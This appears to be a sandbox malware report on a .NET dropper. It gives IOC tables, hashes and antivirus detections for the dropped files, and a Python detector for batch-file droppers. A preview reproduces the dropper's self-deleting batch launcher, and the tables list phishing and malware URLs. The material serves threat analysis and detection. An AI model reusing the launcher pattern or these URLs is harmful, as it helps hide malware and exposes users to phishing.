pastebin.com | installer.exe | malicious | LummaC, PureLog Stealer, Xmrig, zgRAT | 104.20.3.235
pastebin.com | aabJ5lAG3l.doc | malicious | Unknown | 104.20.3.235
pastebin.com | updater.exe | malicious | Xmrig | 104.20.4.235
pastebin.com | DeqcE30sLb.exe | malicious | DCRat | 172.67.19.24
bg.microsoft.map.fastly.net | Ycj3d5NMhc.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | oz9Blof9tN.msi | malicious | CobaltStrike | 199.232.214.172
bg.microsoft.map.fastly.net | QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 199.232.210.172
bg.microsoft.map.fastly.net | invoker.ps1 | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://investors.spotify.com.th.wuush.us.kg/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://cache.netflix.com.sg3.wuush.us.kg/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://apple.vn377.com/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://apple.dogwog.com/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaram | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | http://apple.fnf478.com/ | malicious | Unknown | 199.232.210.172

ASN context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
BEGET-ASRU | yx18iwwPFF.exe | malicious | DCRat | 5.101.153.57
BEGET-ASRU | Fake Intel (1).exe | malicious | Fareit, Kelios | 31.129.99.189
BEGET-ASRU | http://relsoftware.com | malicious | HTMLPhisher | 87.236.16.245
BEGET-ASRU | Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | 45.130.41.127
BEGET-ASRU | http://vfxfilmschool.com | malicious | Unknown | 45.130.41.123
BEGET-ASRU | docs_pdf.exe | malicious | FormBook | 45.130.41.38
BEGET-ASRU | G6uGAyUSVscVBYD.exe | malicious | FormBook | 45.130.41.127
BEGET-ASRU | SHIPPING DOCS_pdf.exe | malicious | FormBook | 45.130.41.38
BEGET-ASRU | purchase order_pdf.exe | malicious | FormBook | 45.130.41.38
BEGET-ASRU | xx-cheat_2.exe | malicious | Unknown | 45.130.41.127
CLOUDFLARENETUS | Ycj3d5NMhc.exe | malicious | Unknown | 104.21.65.79
CLOUDFLARENETUS | rwsNDpQSKZ.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | CBS_applcation_details_072602024_xlsx.js | malicious | WSHRAT | 188.114.96.3
CLOUDFLARENETUS | FpiUD4nYpj.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | 104.26.2.16
CLOUDFLARENETUS | 8SxJ9aYfJ1.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | 104.26.2.16
CLOUDFLARENETUS | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | 188.114.96.3
CLOUDFLARENETUS | https://www.kudoboard.com/boards/ZWwsi9jg | malicious | Unknown | 172.67.37.149
CLOUDFLARENETUS | NsCTgrwBjQ.exe | malicious | Unknown | 172.67.177.136

JA3 fingerprint context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
3b5074b1b5d032e5620f69f9f700ff0e | Ycj3d5NMhc.exe | malicious | Unknown | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | FpiUD4nYpj.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe | malicious | Unknown | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe | malicious | Unknown | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | engine.ps1 | malicious | Unknown | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | invoker.ps1 | malicious | Unknown | 172.67.19.24
3b5074b1b5d032e5620f69f9f700ff0e | tgmes.ps1 | malicious | Unknown | 172.67.19.24
              No context
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (789), with no line terminators
              Category:dropped
              Size (bytes):789
              Entropy (8bit):5.8896689156498105
              Encrypted:false
              SSDEEP:24:Odg5aBbTL9ucK3QR6H3+acsKSpySxRpjsK1F9p1uLdO:Z5ATLbB6XTDrjpoK1LLkO
              MD5:A701D3DB64F41BD080B4B0BC6B84B293
              SHA1:EEAD37E80A1B04C86AEA0EE9A43067B7D339B9B0
              SHA-256:366F803B912BDB018A48A2352DCE35DDC5F905433C88B7B575AB8847C5E9C8D9
              SHA-512:D5685E52C96D1589BB55F698B77936B0371B57217EC5910CE872CA457915F1BB598F793085232F241FB09C59947AF2BE9C2CDBD46897CE8B41960421759D5C66
              Malicious:false
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):212
              Entropy (8bit):5.692847036503528
              Encrypted:false
              SSDEEP:6:CpUekWgoOcZYmIcSWm3xVs5ZyFUzo8JWNnl:CGcgR4hYkVzrJWBl
              MD5:805621B584A26CEDF523A088DC8914DD
              SHA1:D9040C2E5B454F2E591AF76BE0F8C595969F7F98
              SHA-256:7A00ECB699A64EE0F18F692324620309355551FFC7A5AF7E7A9E7AB3BB8BD2C5
              SHA-512:6D11EBC9768C6A16D90363B3A0E964B09FC436DA1738A5BFE6392F0185EC95CA85A0CEFB1CCABC7FD0FCA725AF2BEA960857528127B195BBEE5F727111B3B864
              Malicious:false
              Preview:ZscSO432Lx3MApIQjxEJZqWgbtt8aM0cOs67pawIlh1E6cWXq83957xtV50eK4b96a7RsKlIA6h1ySj8XVScS1hQ5NmtjR7qG2HgeEofXu89a64CW1Hzm9qF3rWfi1js80v6KDdTqwEi3h08SjWrKIEGMCmxrJ7fLPAjK82TYxIz4IMW0XN8f1h0vptIaplhzjWngRyTrDTXAPLE0Q7T
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (736), with no line terminators
              Category:dropped
              Size (bytes):736
              Entropy (8bit):5.887951113595641
              Encrypted:false
              SSDEEP:12:UBeVqKB8ay/DpPhD+2IgzIcL9WjM+pP/hVJbqcrunroiemIeYjonV62vT2i3Q7Ui:UBeVqKKN/DpPk2IUIcLSMSPZrEnSmINd
              MD5:2C085A9489F780F6F791311F22F2F269
              SHA1:339EC11C22C8EA83AEBC881FB4DAC0113F5E5926
              SHA-256:0E0111D0A178C2D44A35D46BFCAF995C985D686A43047E5DF62B4874D3471089
              SHA-512:96C1C8FBEDD886F1815AA52C1E006B12D4D09DECB2697129825E7FAFB831367500107EE24BF98B32F6C2EA8974F2877897E8A9AAC4FFF11335AA948338C2D4CF
              Malicious:false
              Preview:AxNrhCsQ0Q8r1YKSvVFtaRoYIOuRBDCDGXc9chsUTkWeMunIKFodGfTsIyiSRaOxN4ld5K0OmuZz5KLXlmG6Yj7kEu1n8ZD2ViQSJJNAOa0VGew8mKrpUSYo7AZKTMPNrhdW33ObZGr8tlek72AxsYiDKmVIuCqBKmoiBaEt6PQNlZ4VfyNaMbfS9ZLRiFrWZpxG75jhxR1cIUcur9m5zQztHVjlOwK0h3x5mxYkPpm5jCKo7akjcwhJzE9lW8TBGB4OhgI3lCpJn4JEK5nxMlXvVoFhywORWlziI5HbSq7aHXg554aaUfzenI33alFyyXwBFk6PyMffn7o7HKm4Wx71wU59COAqlJltle0V8LmIAT0pe5vQ8LcAa5Ouo6MjMy3eW5WnUR5KKz1ceQeHctsarkSpPFqB8C6LaVTjiI6rPR0lEvQYbFGcGcxvmrXOk4MH3pCI65jUxALZurkdyRj36dF7ih70vsGUFssZtIbgfwpGQXA4G3ZTVSLZkEjZ7sjF31TC8LuqzCXJy9rKgCt1Sx9wgTypiCiwMkMZE855IseS4BllXZ258rwG1ggpWFIwel7NwRGiGytjTr2esNRJKnxexFihbQiDkryTEXyFSTyK8MxKoC7Jx8m0xcartjG0Qq9l2iZUYL01yngkSX2ZSZPlF7gl6HWtM84SNLRFmmulIuCJ6zYVqri0aXg5CxXRzHoztOXGGwxppndU5WpHsBCfaD10
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (679), with no line terminators
              Category:dropped
              Size (bytes):679
              Entropy (8bit):5.89542598666075
              Encrypted:false
              SSDEEP:12:VaXXp02Pc1BB3TQ9CjFWziOA5YfFpF0N5VGSzjwluz29CKk2/rdXhzFEcn7HUJCM:UJ0n1BBUWWz3+I0TVHzjwluz29CKmI7o
              MD5:97029C06ED3EF07213F0706B32F8195C
              SHA1:4C1A75904D116B674D901C5742EC41B77BAE5796
              SHA-256:2EB798AE4691FC639EB2F2DB447F2F5FE02975FA530013BF71C32A06BA5A59B0
              SHA-512:E58D840B01F4499DF5654F573C679B7C5030A3B5D8A2B493805D5CA273BA822C74E5091D5BBD4D98338CA02225966FD1E2AE98482344C49D7E3F1C4088E664DA
              Malicious:false
              Preview:inkNsxFZbBfCoqwuDleSI3YGdSoaAooq4J6Hslcofnmp9veqDmcJrEhpOeuaIpZxWzHfuoBcIzwfQtGrx8WXLe80lR3O0Cf0NzSKo95ZlAA2RCYfXDmKSCm21Q3cvwmGU5Rbb6DyC7vLeGjj2X1xaUiLMaSXFdnyY4hVu7Ea9xIVQbXvrUkY5yq9XFOBnqsjU7xjiNy4TaxmMM5vChpv2O2jOh8otCwTFiBSoyMegpEeBDxLKc9GA7qFENVAPJLQodhnLmHOVKONKYhKuweQDqSH26OacLPWdy0hgJ9hVuvzsd4qqLQcp5M7KavPYrvJ52tWhAnkx64S5cYZBhuQ4wril3WGYuJo9l40uiJphqpsA3CrBVN07fPJKKvonhLCxQTUiiocYEtOH9hr1oECgSreWupjxfBAfm5ukrIdrvc2vABLmDx8cIgejz8y2Fp3CtseDxHJfkVv0ysVsd6tsChWGbLutUklGjzCShIy6nd1wunuHnFZI5L9MWYmmWZL9tpR8pCLVHxEjpkVxanGPLdLX006IfMkOS1CFVvbk3DAHHahvCyMtS5yQe3IyGCz5NzRxhQboLgVIdDQaTKGrA05WDwlcnnd1OE4RItNwWhhwkqxansf66H5W35tvo9BiDe3YI8Rj6TUcSIvX8Kz4Ig4GJhXNAcIXg9tGwZ
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1673
              Entropy (8bit):5.358592927981826
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpv
              MD5:3FA79285624FEE3EDA6CADAE6686B2D7
              SHA1:B4FCD984A014AF609AA60902FAB53EFE05F72D26
              SHA-256:941DC770C2B1ECCBFE753CE22846C885C111EEBF38B74991B54B2D32D5D46466
              SHA-512:2E5B2FC80CAEFCB6D615CC50E4A9250F2A46AFD406720DF016A55AAB09B2EE63A2AED9E7C6832DD6B93318FEFE99EC21D7264207467A764BE078B2226A9002B2
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1915
              Entropy (8bit):5.363869398054153
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
              MD5:E6E3A2B5063C33228E2749DC291A1D3D
              SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
              SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
              SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):215
              Entropy (8bit):5.1781892964276475
              Encrypted:false
              SSDEEP:6:hITg3Nou11r+DEgCh/UcvKOZG1cNwi23fO/bh:OTg9YDEgChcfZ2/N
              MD5:59D123941E6EBDC1C7CD1CFBDD0B2199
              SHA1:76F50D79ECA81264575886330B88E006FCD13486
              SHA-256:49C4B47FAEF0D51DEDF71377C858CD63FC7F3469D824BC1558CF260BE0E8D89D
              SHA-512:98965781109020A988E58AF1D6A939B3C1CFD5EB2E95346BFF05027E406BC2CD6EB1CD0B99788D1E4154C2EEA246343216263AEBFBD48C228F9A0AC3CB179F5B
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TpLSZl35nU.bat"
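The batch file above is the classic dropper launcher: a delay (w32tm /stripchart against localhost, which the w32tm output further down in this report shows timing out with 0x800705B4, ERROR_TIMEOUT, so /period:5 with two samples simply burns a few seconds), a start of the dropped executable from C:\brokermonitordhcp, and deletion of the script itself. The following Python is an added example, not Joe Sandbox code, that flags that sequence in a dropped .bat. SAMPLE_BAT is copied from the preview above with the sandbox's '..' line-terminator rendering turned back into line breaks; the SLEEP_SUBSTITUTES list, TRUSTED_DIRS and the benign counter-example are assumptions constructed for the example.

```python
import re

# Commands batch droppers use as a stand-in for 'sleep' (assumed list for this
# example): w32tm /stripchart against localhost just times out once per sample,
# which is what the report's w32tm output (error 0x800705B4) shows.
SLEEP_SUBSTITUTES = {
    "w32tm":   re.compile(r"^w32tm\s+/stripchart\s+/computer:localhost", re.I),
    "ping":    re.compile(r"^ping\s+(?:-n|/n)\s+\d+", re.I),
    "timeout": re.compile(r"^timeout\s+(?:/t\s+)?\d+", re.I),
    "choice":  re.compile(r"^choice\b.*\s/t\s*\d+", re.I),
}
# Directories from which a 'start' of an .exe is unremarkable (assumed; tune per estate).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# start [""|"title"] "<path>.exe" [args]   and   del [/a /q /f] "<path>.bat"
START_RE = re.compile(r'^start\s+(?:"[^"]*"\s+)?"?(?P<path>[^"]+?\.exe)"?', re.I)
DEL_RE = re.compile(r'^del\s+(?:/[a-z]\s+)*"?(?P<path>[^"]+?\.bat)"?', re.I)


def analyze_batch(text):
    """Describe a .bat and decide whether it matches the dropper pattern:
    a sleep substitute, then 'start' of an .exe outside TRUSTED_DIRS, then
    'del' of a .bat (normally the script itself)."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    result = {"sleep_substitute": None, "launched": [], "self_delete": None}
    sleep_idx = launch_idx = None
    for i, line in enumerate(lines):
        for name, pat in SLEEP_SUBSTITUTES.items():
            if sleep_idx is None and pat.match(line):
                result["sleep_substitute"], sleep_idx = name, i
        m = START_RE.match(line)
        if m:
            result["launched"].append(m["path"])
            if launch_idx is None:
                launch_idx = i
        m = DEL_RE.match(line)
        if m:
            result["self_delete"] = m["path"]
    result["untrusted_launch"] = [
        p for p in result["launched"] if not p.lower().startswith(TRUSTED_DIRS)
    ]
    # All three stages, in order, with the launch from an untrusted directory.
    result["suspicious"] = (
        sleep_idx is not None and launch_idx is not None and sleep_idx < launch_idx
        and bool(result["untrusted_launch"]) and result["self_delete"] is not None
    )
    return result


# Copied from the dropped-file preview above ('..' rendered back as line breaks).
SAMPLE_BAT = r'''@echo off
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul
start "" "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
del /a /q /f "C:\Users\user\AppData\Local\Temp\\TpLSZl35nU.bat"
'''
# Constructed counter-example: a delay and a launch, but from a trusted path and no self-delete.
BENIGN_BAT = r'''@echo off
timeout /t 5 >nul
start "" "C:\Program Files\Vendor\updater.exe"
'''

if __name__ == "__main__":
    for label, bat in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        print(label, analyze_batch(bat))
```

The ordering check matters: a delay that precedes the launch is what makes the w32tm call a sleep rather than a time-sync, and requiring the self-delete keeps ordinary installer scripts out of the alert.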
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):25
              Entropy (8bit):4.483856189774723
              Encrypted:false
              SSDEEP:3:pdJynGSR:zJ03
              MD5:274239029F668394F4A1C17D6D2850BB
              SHA1:4314D10C46DE0CE4195760D7BF521D2563F9DD7E
              SHA-256:3A9044547409552FBAF3684B1DE7E7178DC057AB3337BB1638B6AE11496B5618
              SHA-512:664C3744F5A407CFF0691C57CA33CC12028D052F4F371659C5D8D4887F1D9A36B4B86043ED8EAE9439CE27F2D7AF9FB98DE5C95B1291F7C3BC176925F5343726
              Malicious:false
              Preview:gRLY8zxwcBxN2KBEfr106mTM4
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (517), with no line terminators
              Category:dropped
              Size (bytes):517
              Entropy (8bit):5.875028721397921
              Encrypted:false
              SSDEEP:12:gfZgoLDnuJWPA5N+hSuW8OLQMGyo/cGakwu3mgDkzCaU6VPUSn:SZgUuIY5NyJMkMGB/cGJL3eLJUSn
              MD5:688278E025372CB867FBBEF00A73809D
              SHA1:A34EFB11DE8B864B43FD125192AF9F561B643440
              SHA-256:ED3A1C95669B95E2F7A572C1B8D6FEEEA3BDF8E17A4476E3638EC8D97467ACF6
              SHA-512:9C025483D73B092A23E8A18C7749764C0A0F703C2367DDFC9EB802867CFAEB38049F1C8B57FE694567C8AD54E852A9C7F51064A319FB9D29A67DB17FC7D8ECCC
              Malicious:false
Preview:
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
